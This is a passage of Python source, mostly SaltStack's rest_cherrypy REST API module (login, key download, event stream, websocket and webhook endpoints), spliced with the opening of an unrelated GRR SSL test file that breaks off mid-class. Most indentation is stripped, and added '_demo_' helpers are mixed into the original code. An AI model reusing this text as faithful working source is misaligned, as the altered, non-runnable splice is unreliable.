pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
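# Illustrative client for Keys.POST above (not part of the original
# module): fetch the generated keypair and list the tarball contents.
# URL and credentials are placeholders.
def _demo_fetch_keys(base='https://localhost:8000'):
    import io
    import tarfile
    import requests
    resp = requests.post(base + '/keys', verify=False, data={
        'mid': 'jerry', 'username': 'kickstart',
        'password': 'kickstart', 'eauth': 'pam'})
    tarball = tarfile.open(fileobj=io.BytesIO(resp.content))
    return tarball.getnames()  # ['minion.pub', 'minion.pem']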
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups'] is not False:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
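# Standalone illustration of the permission merge performed in Login.POST:
# '*' perms, user-specific perms, and '%'-suffixed group perms are
# combined. The sample eauth config and token are assumptions.
def _demo_merge_perms():
    eauth = {
        '*': ['test.*'],
        'saltuser': ['grains.*'],
        'admins%': ['.*'],
    }
    token = {'name': 'saltuser', 'groups': ['admins']}
    perms = list(eauth.get(token['name'], []))
    perms.extend(eauth.get('*', []))
    eauth_groups = set(k.rstrip('%') for k in eauth if k.endswith('%'))
    for group in set(token['groups']) & eauth_groups:
        perms.extend(eauth['{0}%'.format(group)])
    return perms  # ['grains.*', 'test.*', '.*']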
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials should not be supplied;
authentication is handled by the SSH layer itself. The salt-ssh client does
not require a running salt master; only a roster file must be present in
the salt configuration directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.info(saltEvent.tag)
console.debug(saltEvent.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
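# Illustrative Python consumer for the /events stream above (not part of
# the original module). Uses requests' streaming mode to read the SSE
# records; the URL and token are placeholders.
def _demo_consume_events(base='http://localhost:8000', token='<session id>'):
    import requests
    resp = requests.get(base + '/events', params={'token': token},
                        stream=True)
    for line in resp.iter_lines(decode_unicode=True):
        if line and line.startswith('data: '):
            event = json.loads(line[len('data: '):])
            print(event['tag'], event['data'])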
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print(ws.recv())
ws.close()
The above examples show how to establish a websocket connection to Salt
and activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try:  # workaround: try to decode, catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# lowdata_fmt stays enabled here, but POST below reads the raw
# unserialized data rather than the formatted lowstate.
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
foo=Foo!&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 17
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
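# Minimal sketch of serving the app returned by get_app. This mirrors what
# the salt-api runner is assumed to do when it starts rest_cherrypy; the
# 'root_prefix' option name is part of that assumption.
def _demo_serve(master_opts):
    root, apiopts, cpyopts = get_app(master_opts)
    cherrypy.quickstart(root, apiopts.get('root_prefix', '/'), cpyopts)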
|
ssl_test.py
|
#!/usr/bin/env python
"""Tests for API client + HTTPS server integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import datetime
import io
import os
import socket
import threading
from absl import app
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
from http import server as http_server
import portpicker
import requests
import socketserver
from grr_api_client import api as grr_api
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import api_call_router_without_checks
from grr_response_server.gui import webauth
from grr_response_server.gui import wsgiapp_testlib
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import test_lib
class ApiSslServerTestBase(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
def setUp(self):
super(ApiSslServerTestBase, self).setUp()
key = rdf_crypto.RSAPrivateKey.GenerateKey()
key_path = os.path.join(self.temp_dir, "key.pem")
with open(key_path, "wb") as f:
f.write(key.AsPEM())
subject = issuer = x509.Name([
x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
])
cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
x509.random_serial_number()).not_valid_before(
datetime.datetime.utcnow()).not_valid_after(
datetime.datetime.utcnow() +
datetime.timedelta(days=1)).add_extension(
x509.SubjectAlternativeName(
[x509.DNSName(u"localhost")]),
critical=False,
).sign(key.GetRawPrivateKey(), hashes.SHA256(),
backends.default_backend())
self.cert_path = os.path.join(self.temp_dir, "certificate.pem")
with open(self.cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
config_overrider = test_lib.ConfigOverrider({
"AdminUI.enable_ssl": True,
"AdminUI.ssl_key_file": key_path,
"AdminUI.ssl_cert_file": self.cert_path,
})
config_overrider.Start()
self.addCleanup(config_overrider.Stop)
self.port = portpicker.pick_unused_port()
thread = wsgiapp_testlib.ServerThread(self.port, name="ApiSslServerTest")
thread.StartAndWaitUntilServing()
self.addCleanup(thread.Stop)
api_auth_manager.InitializeApiAuthManager(
api_call_router_without_checks.ApiCallRouterWithoutChecks)
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.endpoint = "https://localhost:%s" % self.port
class ApiSslE2ETestMixin(object):
def testGetClientWorks(self):
# By testing GetClient we test a simple GET method.
client_id = self.SetupClient(0)
c = self.api.Client(client_id=client_id).Get()
self.assertEqual(c.client_id, client_id)
def testSearchClientWorks(self):
# By testing SearchClients we test an iterator-based API method.
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testPostMethodWorks(self):
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
client_ref = self.api.Client(client_id=client_id)
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
self.assertTrue(result_flow.client_id)
def testDownloadingFileWorks(self):
client_id = self.SetupClient(0)
fixture_test_lib.ClientFixture(client_id)
out = io.BytesIO()
self.api.Client(client_id=client_id).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertTrue(out.getvalue())
class ApiSslWithoutCABundleTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_id = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_id).Get()
class ApiSslWithEnvVarWithoutMergingTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_id = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint, trust_env=False)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_id).Get()
class ApiSslWithConfigurationInEnvVarsE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).setUp()
prev_environ = dict(os.environ)
def _CleanUpEnviron():
os.environ.clear()
os.environ.update(prev_environ)
self.addCleanup(_CleanUpEnviron)
os.environ["REQUESTS_CA_BUNDLE"] = self.cert_path
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
class ApiSslWithWithVerifyFalseE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyFalseE2ETest, self).setUp()
self.api = grr_api.InitHttp(api_endpoint=self.endpoint, verify=False)
class ApiSslWithWithVerifyPointingToCABundleTest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyPointingToCABundleTest, self).setUp()
self.api = grr_api.InitHttp(
api_endpoint=self.endpoint, verify=self.cert_path)
class Proxy(http_server.SimpleHTTPRequestHandler):
requests = []
def do_CONNECT(self): # pylint: disable=invalid-name
self.__class__.requests.append(self.requestline)
class TCPServerV6(socketserver.TCPServer):
